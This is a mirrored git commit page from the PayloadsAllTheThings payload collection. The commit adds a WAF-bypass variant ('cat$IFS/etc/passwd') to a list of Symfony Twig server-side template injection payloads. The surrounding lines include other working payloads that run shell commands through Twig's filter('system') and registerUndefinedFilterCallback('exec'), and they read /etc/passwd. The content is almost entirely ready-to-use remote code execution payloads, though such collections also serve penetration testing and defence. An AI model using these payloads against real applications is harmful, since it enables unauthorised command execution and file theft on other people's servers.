mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-20 18:28:50 +00:00
Added IFS (WAF bypass) to Symfony Twig RCE
This commit is contained in:
parent
8b78c2fe71
commit
38c273ff00
@ -159,6 +159,7 @@ $output = $twig > render (
|
||||
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
|
||||
{{['id']|filter('system')}}
|
||||
{{['cat\x20/etc/passwd']|filter('system')}}
|
||||
{{['cat$IFS/etc/passwd']|filter('system')}}
|
||||
```
|
||||
|
||||
Example with an email passing FILTER_VALIDATE_EMAIL PHP.
|
||||
|
Loading…
Reference in New Issue
Block a user